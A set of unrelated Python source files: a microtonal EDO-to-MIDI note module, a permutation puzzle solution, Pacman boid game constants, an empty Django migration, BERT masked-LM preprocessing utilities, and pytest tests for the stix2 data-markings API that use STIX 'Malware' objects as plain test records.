check_negative(freq)
return freq_axis**2/freq
def ifreq(freq_axis, index, steps=12):
"""Returns a frequency using step and octave index
Parameters
----------
freq_axis : float
The frequency acting as the 'axis'
index : tuple
A 2-element tuple describing the distance of the desired frequency
from freq, where the first element is the number of steps and the
second is the number of octaves (accepts negative values)
steps : int
The number of equal steps to divide the octave (default is 12)
Returns
-------
float
a frequency based on EDO distance from freq
"""
check_negative(freq_axis)
return freq_axis*2**(index[0]/steps + index[1])
def get_closest_midi_note(freq, cent_thresh):
"""Iterates the midi dict to find the item with smallest frequency difference,
determined by the cent threshold.
Parameters
----------
freq : float
The given frequency
cent_thresh : float
The cent threshold
Returns
-------
The midi note nearest to the given frequency
"""
for item in midi_dict.items():
if abs(cent_diff(freq, item[1])) <= cent_thresh:
return item
def get_midi(freq):
"""Returns a MIDI event representing the given frequency.
Microtonal frequencies will be slotted to the nearest MIDI note
with a pitch wheel value applied to it.
Parameters
----------
freq : float
The desired frequency
Returns
-------
A tuple consisting of the nearest MIDI note and pitch wheel value
(will be 0 if frequency is in Equal Temperament)
"""
max_wheel = 8191
max_cents = 200
ratio = max_wheel/max_cents
midi_num, midi_freq = get_closest_midi_note(freq, 50.1)
wheel = int(cent_diff(midi_freq, freq)*ratio)
return midi_num, wheel
class EDO:
"""Equal Divisions of Octave; produces 'Notes' using step/octave indexing.
"""
def __init__(self, A4, steps=0, table=None, start=0):
"""Constructs an EDO either using steps or a table
(size of table determines total steps)
Parameters
----------
A4 : float
Concert pitch that is represented as A4 in western music
steps : int
Total steps to split octave into
table : list
A list of lists containing the different names for each note
start : int
The index of A4 in the table.
"""
self.A4 = A4
self.start = start
if table is not None:
size = len(table)
# move elements according to where the start is
if start != 0:
self.table = table[:start] + table[start:]
else:
self.table = table
self.dict = {n:i for i in range(size) for n in self.table[i]}
self.steps = size
elif steps != 0:
self.table = None
self.steps = steps
else:
raise ValueError('either table or steps must be specified')
def __getitem__(self, index):
# extract note name and octave if string
if isinstance(index, str):
if self.dict is None:
raise Exception('no dictionary defined in EDO')
split = re.findall(r"[A-Z][b#]?|\d", index)
# i : step index
i = self.dict[split[0]]
# j : octave index
j = int(split[1])
index = i, j
# nothing to do when tuple, just check if it isn't
elif not isinstance(index, tuple):
raise ValueError('invalid index type')
return Note(self, index)
def step_in_cents(self):
return cent_diff(self[0,4].freq(), self[1,4].freq())
def __str__(self):
return '<{}.{} steps={} A4={} at {}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.steps,
self.A4,
hex(id(self)))
def __repr__(self):
return str(self)
@staticmethod
def twelve(A4=440):
"""Returns 12 EDO
"""
return EDO(A4, table=table, start=9)
class Note:
"""Class representing notes. Can produce more notes using
the EDO used or using intervals.
"""
def __init__(self, edo, index):
self.edo = edo
self.index = index
self.start = 0
self.end = 0
self.velocity = 96
self.cents = 0
def names(self):
if self.edo is None or self.edo.table is None:
return []
return self.edo.table[self.index[0]]
def name(self):
if self.edo is None or self.edo.table is None:
return ''
return self.names()[0]
def A4(self):
return self.edo.A4
def detune(self, cents):
self.cents = cents
return self
def freq(self):
A4 = self.edo.A4
i = self.index[0] - self.edo.steps - self.edo.start
j = self.index[1] - 3
return detune(ifreq(A4, (i, j), self.edo.steps), self.cents)
def __getitem__(self, index):
"""Creates a new note based on index. The EDO and detuned cents are also passed.
Index: can be either int or tuple. int specifies
the steps from this note according to the EDO, tuple
also provides the octave.
Interval: by using float. Sets this note as the axis for the new note.
"""
if isinstance(index, (int, tuple)):
if isinstance(index, tuple):
i = self.index[0] + index[0]
j = self.index[1] + index[1]
else:
i = self.index[0] + index
j = self.index[1]
n_index = i%self.edo.steps, i//self.edo.steps + j
cents = 0
elif isinstance(index, float):
freq = self.freq()
cent_dist = cent_diff(freq, freq * index)
step_in_cents = self.edo.step_in_cents()
closest_i = round(round(cent_dist/step_in_cents))
i = self.index[0] + closest_i
j = self.index[1]
n_index = i%self.edo.steps, i//self.edo.steps + j
cents = cent_dist - closest_i*step_in_cents
else:
raise ValueError('invalid value for index/interval')
return Note(self.edo, n_index).detune(self.cents + cents)
def get_midi(self):
return get_midi(self.freq())
def __str__(self):
return '<{}.{} name(s)={}, index={}, ({}c) at {}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.names(),
self.index,
round(self.cents, 2),
hex(id(self)))
def __repr__(self):
return str(self)
import pathlib
filename = pathlib.Path(__file__).parent / '12edo.csv'
table = list(csv.reader(open(filename)))
midi_dict = {i : ifreq(440, (i -69, 0)) for i in range(128)}
| python |
import itertools
N = int(input())
pairs = []
for x in range(N):
input_ = input().split()
pairs.append([input_[0], input_[len(input_)-1]])
random = ['Beatrice', 'Sue', 'Belinda', 'Bessie', 'Betsy', 'Blue', 'Bella', 'Buttercup']
perm = list(itertools.permutations(random))
possible_list = []
for x in range(len(perm)):
possible = True
temp = perm[x]
for y in range(len(pairs)):
pair = pairs[y]
first = pair[0]
second = pair[1]
if temp.index(first) + 1 == temp.index(second) or temp.index(first) - 1 == temp.index(second):
continue
else:
possible = False
break
if possible == True:
possible_list.append(temp)
minimum = min(possible_list)
for x in minimum:
print(x) | python |
""" written by Joel
file from previous assignment with some changes to fit the new one
contains all the magic numbers for the boid class created in the Pacman game
"""
import numpy as np
# if True the objects that passes through the screen will
# appear on a random spot on the other side.
RANDOM_MODE = False
# screen settings
SCREEN_WIDTH = 1080
SCREEN_HIGHT = 720
SCREEN_RESOLUTION = (SCREEN_WIDTH, SCREEN_HIGHT)
FPS = 30
BACKGROUNG_COLOR_MIN = 15
BACKGROUNG_COLOR_MAX = 75
# characters settings
# maxSpeed, color, position, radius, width, hight
BOID_SPEC = (10, (255,255,55), 5, 20,10)
MIN_BOIDFLOCK = 2
COLLITION_RADIUS = 20
FLOCK_RADIUS = 80
PREADATOR_RADIUS = 150
# maxSpeed, color, position, radius, width, hight
PACMAN_SPEC = (15, (255,255,255), 15, 20,10)
PACMAN_START_POS = (500,500)
PACMAN_SIGHT = 250
GHOST_SPEC = (5 , (255,255,255), 50, 20,10)
GHOST_START_POS = [(100,100),(100,700),(700,100),(700,700)]
GHOST_DAMPING = 0.5
# color, radius, width, hight
OBSTACLE_SPEC = ((255,55,55), 25, 50, 50)
| python |
# Generated by Django 2.1.7 on 2019-04-01 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('webapp', '0039_auto_20190317_1533'),
('webapp', '0040_merge_20190312_1600'),
]
operations = [
]
| python |
import logging
import random
import numpy as np
from transformers import BertConfig
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
class InputFeatures(object):
"""A single set of original_features of data."""
def __init__(self, input_ids, input_mask, segment_ids, is_next, lm_label_ids):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.is_next = is_next
self.lm_label_ids = lm_label_ids
class InputExample(object):
"""A single training/test example for the language model."""
def __init__(self, guid, tokens_a, tokens_b=None, is_next=None, lm_labels=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
tokens_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
tokens_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.tokens_a = tokens_a
self.tokens_b = tokens_b
self.is_next = is_next # nextSentence
self.lm_labels = lm_labels # masked words for language model
def unmask_lm_labels(input_ids, masked_lm_labels):
"""
Get unmasked LM labels
"""
input_ids = np.asarray(input_ids)
masked_lm_labels = np.asarray(masked_lm_labels)
inp_shape = input_ids.shape
unmasked_lm_labels = np.copy(input_ids.flatten())
masked_token_indices = np.where(masked_lm_labels.flatten() != -1)[0]
masked_tokens = masked_lm_labels.flatten()[masked_token_indices]
unmasked_lm_labels[masked_token_indices] = masked_tokens
unmasked_lm_labels = unmasked_lm_labels.reshape(inp_shape)
return unmasked_lm_labels
def get_seq_lengths(single_seq_len, is_same):
if is_same:
# when there are 2 tokens, max_seq_length is double and account for BERT adding [CLS], [SEP], [SEP]
total_seq_len = single_seq_len * 2
else:
# Account for BERT adding [CLS], [SEP]
total_seq_len = single_seq_len
single_seq_len -= 2
return single_seq_len, total_seq_len
def random_word(tokens, tokenizer, inference_mode: bool = False):
"""
Masking some random tokens for Language Model task with probabilities as in the original BERT paper.
Args:
tokens: list of str, tokenized sentence.
tokenizer: Tokenizer, object used for tokenization (we need it's vocab here)
inference_mode: if True, don't do any input modifications. Used at inference time.
Returns
tokens: masked tokens
output_label: labels for LM prediction
"""
output_label = []
for i in range(len(tokens)):
prob = random.random()
# mask token with 15% probability
if prob < 0.15 and not inference_mode:
prob /= 0.15
# 80% randomly change token to mask token
if prob < 0.8:
token = '[MASK]'
# 10% randomly change token to random token
elif prob < 0.9:
token = random.choice(list(tokenizer.token_to_idx.items()))[0]
while (token in tokenizer.symbols) or (token == tokens[i]):
token = random.choice(list(tokenizer.token_to_idx.items()))[0]
# -> rest 10% randomly keep current token
else:
token = tokens[i]
# set the replace token and append token to output (we will predict these later)
try:
output_label.append(tokenizer.token_to_idx[tokens[i]])
tokens[i] = token
except KeyError:
# For unknown words (should not occur with BPE vocab)
output_label.append(tokenizer.token_to_idx['[UNK]'])
logger.warning('Cannot find token "{}" in token_to_idx. Using [UNK] instead'.format(tokens[i]))
else:
# no masking token (will be ignored by loss function later)
output_label.append(-1)
return tokens, output_label
def convert_example_to_features(example, max_seq_length, tokenizer, inference_mode: bool = False):
"""
Convert a raw sample (pair of sentences as tokenized strings) into a proper training sample with
IDs, LM labels, input_mask, CLS and SEP tokens etc.
Args:
example: InputExample, containing sentence input as strings and is_next label
max_seq_length: maximum length of sequence.
tokenizer: Tokenizer
inference_mode: if True, don't do any input modifications. Used at inference time.
Returns:
features: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
"""
tokens_a = example.tokens_a
tokens_b = example.tokens_b
if tokens_b is None:
tokens_b = []
tokens_a, t1_label = random_word(tokens_a, tokenizer, inference_mode)
tokens_b, t2_label = random_word(tokens_b, tokenizer, inference_mode)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = [-1] + t1_label + [-1] + (t2_label + [-1] if len(t2_label) > 0 else [])
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where 'type_ids' are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the 'sentence vector'. Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append('[CLS]')
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append('[SEP]')
segment_ids.append(0)
if len(tokens_b) > 0:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append('[SEP]')
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
lm_label_ids.append(-1)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(lm_label_ids) == max_seq_length
# if example.guid < 5:
# logger.info('*** Example ***')
# logger.info('guid: %s' % example.guid)
# logger.info('tokens: %s' % ' '.join([str(x) for x in tokens]))
# logger.info('input_ids: %s' % ' '.join([str(x) for x in input_ids]))
# logger.info('input_mask: %s' % ' '.join([str(x) for x in input_mask]))
# logger.info('segment_ids: %s' % ' '.join([str(x) for x in segment_ids]))
# logger.info('LM label: %s ' % lm_label_ids)
# logger.info('Is next sentence label: %s ' % example.is_next)
features = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
lm_label_ids=lm_label_ids,
is_next=example.is_next,
)
return features
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class BertConfigExtras(BertConfig):
"""
Same as BertConfig, BUT
adds any kwarg as a member field
"""
def __init__(
self,
vocab_size_or_config_json_file,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
**kwargs,
):
super(BertConfigExtras, self).__init__(
vocab_size_or_config_json_file,
hidden_size=hidden_size,
num_hidden_layers=num_hidden_layers,
num_attention_heads=num_attention_heads,
intermediate_size=intermediate_size,
hidden_act=hidden_act,
hidden_dropout_prob=hidden_dropout_prob,
attention_probs_dropout_prob=attention_probs_dropout_prob,
max_position_embeddings=max_position_embeddings,
type_vocab_size=type_vocab_size,
initializer_range=initializer_range,
)
for k, v in kwargs.items():
setattr(self, k, v)
| python |
import pytest
from stix2 import TLP_AMBER, Malware, exceptions, markings
from .constants import FAKE_TIME, MALWARE_ID
from .constants import MALWARE_KWARGS as MALWARE_KWARGS_CONST
from .constants import MARKING_IDS
"""Tests for the Data Markings API."""
MALWARE_KWARGS = MALWARE_KWARGS_CONST.copy()
MALWARE_KWARGS.update({
'id': MALWARE_ID,
'created': FAKE_TIME,
'modified': FAKE_TIME,
})
@pytest.mark.parametrize("data", [
(
Malware(**MALWARE_KWARGS),
Malware(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MARKING_IDS[0],
),
(
MALWARE_KWARGS,
dict(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MARKING_IDS[0],
),
(
Malware(**MALWARE_KWARGS),
Malware(object_marking_refs=[TLP_AMBER.id],
**MALWARE_KWARGS),
TLP_AMBER,
),
])
def test_add_markings_one_marking(data):
before = data[0]
after = data[1]
before = markings.add_markings(before, data[2], None)
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
def test_add_markings_multiple_marking():
before = Malware(
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1]],
**MALWARE_KWARGS
)
before = markings.add_markings(before, [MARKING_IDS[0], MARKING_IDS[1]], None)
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
def test_add_markings_combination():
before = Malware(
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1]],
granular_markings=[
{
"selectors": ["labels"],
"marking_ref": MARKING_IDS[2]
},
{
"selectors": ["name"],
"marking_ref": MARKING_IDS[3]
}
],
**MALWARE_KWARGS
)
before = markings.add_markings(before, MARKING_IDS[0], None)
before = markings.add_markings(before, MARKING_IDS[1], None)
before = markings.add_markings(before, MARKING_IDS[2], "labels")
before = markings.add_markings(before, MARKING_IDS[3], "name")
for m in before["granular_markings"]:
assert m in after["granular_markings"]
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
@pytest.mark.parametrize("data", [
([""]),
(""),
([]),
([MARKING_IDS[0], 456])
])
def test_add_markings_bad_markings(data):
before = Malware(
**MALWARE_KWARGS
)
with pytest.raises(exceptions.InvalidValueError):
before = markings.add_markings(before, data, None)
assert "object_marking_refs" not in before
GET_MARKINGS_TEST_DATA = \
{
"a": 333,
"b": "value",
"c": [
17,
"list value",
{
"g": "nested",
"h": 45
}
],
"x": {
"y": [
"hello",
88
],
"z": {
"foo1": "bar",
"foo2": 65
}
},
"object_marking_refs": ["11"],
"granular_markings": [
{
"marking_ref": "1",
"selectors": ["a"]
},
{
"marking_ref": "2",
"selectors": ["c"]
},
{
"marking_ref": "3",
"selectors": ["c.[1]"]
},
{
"marking_ref": "4",
"selectors": ["c.[2]"]
},
{
"marking_ref": "5",
"selectors": ["c.[2].g"]
},
{
"marking_ref": "6",
"selectors": ["x"]
},
{
"marking_ref": "7",
"selectors": ["x.y"]
},
{
"marking_ref": "8",
"selectors": ["x.y.[1]"]
},
{
"marking_ref": "9",
"selectors": ["x.z"]
},
{
"marking_ref": "10",
"selectors": ["x.z.foo2"]
},
]
}
@pytest.mark.parametrize("data", [GET_MARKINGS_TEST_DATA])
def test_get_markings_object_marking(data):
assert set(markings.get_markings(data, None)) == set(["11"])
@pytest.mark.parametrize("data", [GET_MARKINGS_TEST_DATA])
def test_get_markings_object_and_granular_combinations(data):
"""Test multiple combinations for inherited and descendant markings."""
assert set(markings.get_markings(data, "a", False, False)) == set(["1"])
assert set(markings.get_markings(data, "a", True, False)) == set(["1", "11"])
assert set(markings.get_markings(data, "a", True, True)) == set(["1", "11"])
assert set(markings.get_markings(data, "a", False, True)) == set(["1"])
assert set(markings.get_markings(data, "b", False, False)) == set([])
assert set(markings.get_markings(data, "b", True, False)) == set(["11"])
assert set(markings.get_markings(data, "b", True, True)) == set(["11"])
assert set(markings.get_markings(data, "b", False, True)) == set([])
assert set(markings.get_markings(data, "c", False, False)) == set(["2"])
assert set(markings.get_markings(data, "c", True, False)) == set(["2", "11"])
assert set(markings.get_markings(data, "c", True, True)) == set(["2", "3", "4", "5", "11"])
assert set(markings.get_markings(data, "c", False, True)) == set(["2", "3", "4", "5"])
assert set(markings.get_markings(data, "c.[0]", False, False)) == set([])
assert set(markings.get_markings(data, "c.[0]", True, False)) == set(["2", "11"])
assert set(markings.get_markings(data, "c.[0]", True, True)) == set(["2", "11"])
assert set(markings.get_markings(data, "c.[0]", False, True)) == set([])
assert set(markings.get_markings(data, "c.[1]", False, False)) == set(["3"])
assert set(markings.get_markings(data, "c.[1]", True, False)) == set(["2", "3", "11"])
assert set(markings.get_markings(data, "c.[1]", True, True)) == set(["2", "3", "11"])
assert set(markings.get_markings(data, "c.[1]", False, True)) == set(["3"])
assert set(markings.get_markings(data, "c.[2]", False, False)) == set(["4"])
assert set(markings.get_markings(data, "c.[2]", True, False)) == set(["2", "4", "11"])
assert set(markings.get_markings(data, "c.[2]", True, True)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2]", False, True)) == set(["4", "5"])
assert set(markings.get_markings(data, "c.[2].g", False, False)) == set(["5"])
assert set(markings.get_markings(data, "c.[2].g", True, False)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2].g", True, True)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2].g", False, True)) == set(["5"])
assert set(markings.get_markings(data, "x", False, False)) == set(["6"])
assert set(markings.get_markings(data, "x", True, False)) == set(["6", "11"])
assert set(markings.get_markings(data, "x", True, True)) == set(["6", "7", "8", "9", "10", "11"])
assert set(markings.get_markings(data, "x", False, True)) == set(["6", "7", "8", "9", "10"])
assert set(markings.get_markings(data, "x.y", False, False)) == set(["7"])
assert set(markings.get_markings(data, "x.y", True, False)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y", True, True)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y", False, True)) == set(["7", "8"])
assert set(markings.get_markings(data, "x.y.[0]", False, False)) == set([])
assert set(markings.get_markings(data, "x.y.[0]", True, False)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y.[0]", True, True)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y.[0]", False, True)) == set([])
assert set(markings.get_markings(data, "x.y.[1]", False, False)) == set(["8"])
assert set(markings.get_markings(data, "x.y.[1]", True, False)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y.[1]", True, True)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y.[1]", False, True)) == set(["8"])
assert set(markings.get_markings(data, "x.z", False, False)) == set(["9"])
assert set(markings.get_markings(data, "x.z", True, False)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z", True, True)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z", False, True)) == set(["9", "10"])
assert set(markings.get_markings(data, "x.z.foo1", False, False)) == set([])
assert set(markings.get_markings(data, "x.z.foo1", True, False)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z.foo1", True, True)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z.foo1", False, True)) == set([])
assert set(markings.get_markings(data, "x.z.foo2", False, False)) == set(["10"])
assert set(markings.get_markings(data, "x.z.foo2", True, False)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z.foo2", True, True)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z.foo2", False, True)) == set(["10"])
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_remove_markings_object_level(data):
before = data[0]
after = data[1]
before = markings.remove_markings(before, MARKING_IDS[0], None)
assert 'object_marking_refs' not in before
assert 'object_marking_refs' not in after
modified = after['modified']
after = markings.remove_markings(after, MARKING_IDS[0], None)
modified == after['modified']
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
Malware(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], MARKING_IDS[2]],
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
dict(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], MARKING_IDS[2]],
),
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], TLP_AMBER.id],
**MALWARE_KWARGS),
Malware(object_marking_refs=[MARKING_IDS[1]],
**MALWARE_KWARGS),
[MARKING_IDS[0], TLP_AMBER],
),
])
def test_remove_markings_multiple(data):
before = data[0]
after = data[1]
before = markings.remove_markings(before, data[2], None)
assert before['object_marking_refs'] == after['object_marking_refs']
def test_remove_markings_bad_markings():
before = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS
)
with pytest.raises(AssertionError) as excinfo:
markings.remove_markings(before, [MARKING_IDS[4]], None)
assert str(excinfo.value) == "Marking ['%s'] was not found in Malware!" % MARKING_IDS[4]
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_clear_markings(data):
before = data[0]
after = data[1]
before = markings.clear_markings(before, None)
assert 'object_marking_refs' not in before
assert 'object_marking_refs' not in after
def test_is_marked_object_and_granular_combinations():
"""Test multiple combinations for inherited and descendant markings."""
test_sdo = \
{
"a": 333,
"b": "value",
"c": [
17,
"list value",
{
"g": "nested",
"h": 45
}
],
"x": {
"y": [
"hello",
88
],
"z": {
"foo1": "bar",
"foo2": 65
}
},
"object_marking_refs": "11",
"granular_markings": [
{
"marking_ref": "1",
"selectors": ["a"]
},
{
"marking_ref": "2",
"selectors": ["c"]
},
{
"marking_ref": "3",
"selectors": ["c.[1]"]
},
{
"marking_ref": "4",
"selectors": ["c.[2]"]
},
{
"marking_ref": "5",
"selectors": ["c.[2].g"]
},
{
"marking_ref": "6",
"selectors": ["x"]
},
{
"marking_ref": "7",
"selectors": ["x.y"]
},
{
"marking_ref": "8",
"selectors": ["x.y.[1]"]
},
{
"marking_ref": "9",
"selectors": ["x.z"]
},
{
"marking_ref": "10",
"selectors": ["x.z.foo2"]
},
]
}
assert markings.is_marked(test_sdo, ["1"], "a", False, False)
assert markings.is_marked(test_sdo, ["1", "11"], "a", True, False)
assert markings.is_marked(test_sdo, ["1", "11"], "a", True, True)
assert markings.is_marked(test_sdo, ["1"], "a", False, True)
assert markings.is_marked(test_sdo, "b", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["11"], "b", True, False)
assert markings.is_marked(test_sdo, ["11"], "b", True, True)
assert markings.is_marked(test_sdo, "b", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["2"], "c", False, False)
assert markings.is_marked(test_sdo, ["2", "11"], "c", True, False)
assert markings.is_marked(test_sdo, ["2", "3", "4", "5", "11"], "c", True, True)
assert markings.is_marked(test_sdo, ["2", "3", "4", "5"], "c", False, True)
assert markings.is_marked(test_sdo, "c.[0]", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["2", "11"], "c.[0]", True, False)
assert markings.is_marked(test_sdo, ["2", "11"], "c.[0]", True, True)
assert markings.is_marked(test_sdo, "c.[0]", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["3"], "c.[1]", False, False)
assert markings.is_marked(test_sdo, ["2", "3", "11"], "c.[1]", True, False)
assert markings.is_marked(test_sdo, ["2", "3", "11"], "c.[1]", True, True)
assert markings.is_marked(test_sdo, ["3"], "c.[1]", False, True)
assert markings.is_marked(test_sdo, ["4"], "c.[2]", False, False)
assert markings.is_marked(test_sdo, ["2", "4", "11"], "c.[2]", True, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2]", True, True)
assert markings.is_marked(test_sdo, ["4", "5"], "c.[2]", False, True)
assert markings.is_marked(test_sdo, ["5"], "c.[2].g", False, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2].g", True, False)
assert markings.is_marked(test_sdo, ["2", "4", "5", "11"], "c.[2].g", True, True)
assert markings.is_marked(test_sdo, ["5"], "c.[2].g", False, True)
assert markings.is_marked(test_sdo, ["6"], "x", False, False)
assert markings.is_marked(test_sdo, ["6", "11"], "x", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "9", "10", "11"], "x", True, True)
assert markings.is_marked(test_sdo, ["6", "7", "8", "9", "10"], "x", False, True)
assert markings.is_marked(test_sdo, ["7"], "x.y", False, False)
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y", True, True)
assert markings.is_marked(test_sdo, ["7", "8"], "x.y", False, True)
assert markings.is_marked(test_sdo, "x.y.[0]", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y.[0]", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "11"], "x.y.[0]", True, True)
assert markings.is_marked(test_sdo, "x.y.[0]", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["8"], "x.y.[1]", False, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y.[1]", True, False)
assert markings.is_marked(test_sdo, ["6", "7", "8", "11"], "x.y.[1]", True, True)
assert markings.is_marked(test_sdo, ["8"], "x.y.[1]", False, True)
assert markings.is_marked(test_sdo, ["9"], "x.z", False, False)
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z", True, True)
assert markings.is_marked(test_sdo, ["9", "10"], "x.z", False, True)
assert markings.is_marked(test_sdo, "x.z.foo1", inherited=False, descendants=False) is False
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z.foo1", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "11"], "x.z.foo1", True, True)
assert markings.is_marked(test_sdo, "x.z.foo1", inherited=False, descendants=True) is False
assert markings.is_marked(test_sdo, ["10"], "x.z.foo2", False, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z.foo2", True, False)
assert markings.is_marked(test_sdo, ["6", "9", "10", "11"], "x.z.foo2", True, True)
assert markings.is_marked(test_sdo, ["10"], "x.z.foo2", False, True)
assert markings.is_marked(test_sdo, ["11"], None, True, True)
assert markings.is_marked(test_sdo, ["2"], None, True, True) is False
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_is_marked_no_markings(data):
marked = data[0]
nonmarked = data[1]
assert markings.is_marked(marked)
assert markings.is_marked(nonmarked) is False
def test_set_marking():
before = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[4], MARKING_IDS[5]],
**MALWARE_KWARGS
)
before = markings.set_markings(before, [MARKING_IDS[4], MARKING_IDS[5]], None)
for m in before["object_marking_refs"]:
assert m in [MARKING_IDS[4], MARKING_IDS[5]]
assert [MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]] not in before["object_marking_refs"]
for x in before["object_marking_refs"]:
assert x in after["object_marking_refs"]
